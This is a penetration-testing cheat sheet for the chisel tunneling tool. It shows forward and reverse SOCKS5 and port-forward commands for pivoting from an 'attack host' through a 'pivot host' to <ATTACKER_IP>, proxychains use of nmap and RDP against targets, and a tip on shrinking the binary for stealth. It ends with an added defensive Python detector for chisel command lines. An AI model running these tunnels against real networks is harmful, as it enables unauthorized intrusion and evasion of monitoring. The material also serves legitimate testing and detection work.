chisel
TCP/UDP tunneling tool written in Go. Transports data over HTTP, secured with SSH. Supports SOCKS5 proxying and port forwarding.
Install
```bash
git clone https://github.com/jpillora/chisel.git
cd chisel && go build
```
Or grab a prebuilt binary from Releases.
Forward SOCKS5 Tunnel
Server on pivot host, client on attack host:
```bash
# Pivot host
./chisel server -v -p 1234 --socks5
# Attack host
./chisel client -v <PIVOT_IP>:1234 socks
```
Reverse SOCKS5 Tunnel
Server on attack host, client on pivot host:
```bash
# Attack host
sudo ./chisel server --reverse -v -p 1234 --socks5
# Pivot host
./chisel client -v <ATTACKER_IP>:1234 R:socks
```
Port Forwarding
Forward a specific port through the tunnel:
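```bash
# Forward: client listens on 8080, traffic exits via the server to <TARGET_IP>:80
./chisel client <SERVER_IP>:1234 8080:<TARGET_IP>:80
# Reverse (server must run with --reverse): server listens on 8080, traffic exits via the client to <TARGET_IP>:80
./chisel client <SERVER_IP>:1234 R:8080:<TARGET_IP>:80
```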
Proxychains Integration
Add to /etc/proxychains.conf:
```
[ProxyList]
socks5 127.0.0.1 1080
```
Then use:
```bash
proxychains xfreerdp /v:<TARGET_IP> /u:<USER> /p:<PASS>
proxychains nmap -sT <TARGET_IP>
```
Common Flags
| Flag | Description |
|---|---|
| `-v` | Verbose output |
| `-p` | Server listen port |
| `--socks5` | Enable SOCKS5 proxy |
| `--reverse` | Allow reverse tunnels (server-side) |
| `R:socks` | Reverse SOCKS5 remote (client-side) |
| `--auth` | Set username:password for authentication |
Notes
- Default SOCKS5 proxy port is 1080
- Transfer binary to pivot host via `scp`, `wget`, or other file transfer method
- Mind binary size for stealth; consider `go build -ldflags="-s -w"` to shrink it
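
The flags and remote specs listed above give defenders a stable argument shape to look for in process-creation logs, even when the binary has been renamed. The following is an added example, not part of the original page or the chisel project: a heuristic classifier whose function names, sample command lines and addresses are all constructed for illustration.

```python
import re
import shlex

# Remote specs in the forms this page uses: socks, R:socks, 8080:host:80, R:8080:host:80
REMOTE_RE = re.compile(r"^(R:)?(socks|\d{1,5}:[^:\s]+:\d{1,5})$")
HOSTPORT_RE = re.compile(r"^(https?://)?[\w.\-]+:\d{1,5}$")
SERVER_FLAGS = {"--reverse", "--socks5"}
VALUE_FLAGS = {"--auth"}  # flags whose next token is a value, not a positional

def _positionals(args):
    """Drop flags (and the value following a VALUE_FLAGS entry); keep positionals."""
    out, skip = [], False
    for a in args:
        if skip:
            skip = False
        elif a in VALUE_FLAGS:
            skip = True
        elif not a.startswith("-"):
            out.append(a)
    return out

def classify(cmdline):
    """Return a finding if argv has the chisel argument shape, else None.
    Only arguments are inspected, so a renamed binary is still flagged."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        return None
    for i, arg in enumerate(argv[1:], start=1):
        rest = argv[i + 1:]
        if arg == "server":
            hits = SERVER_FLAGS.intersection(rest)
            if hits:
                return "server:" + ",".join(sorted(hits))
        elif arg == "client":
            pos = _positionals(rest)
            remotes = [r for r in pos[1:] if REMOTE_RE.match(r)]
            if pos and HOSTPORT_RE.match(pos[0]) and remotes:
                kind = "reverse" if any(r.startswith("R:") for r in remotes) else "forward"
                return f"client:{kind}:{','.join(remotes)}"
    return None

# Constructed process-creation command lines (addresses are placeholders).
SAMPLE = [
    "sudo ./chisel server --reverse -v -p 1234 --socks5",
    "/tmp/.cache/updater client --auth u:p 198.51.100.7:1234 R:socks",
    "./chisel client 192.0.2.10:1234 8080:203.0.113.5:80",
    "ssh -L 8080:203.0.113.5:80 ops@192.0.2.20",
    "python3 manage.py runserver 0.0.0.0:8000",
]
FINDINGS = {line: classify(line) for line in SAMPLE}
```

This is a triage heuristic: it keys on the `server`/`client` subcommand plus the remote syntax, so treat a hit as a lead to correlate with network telemetry rather than as proof.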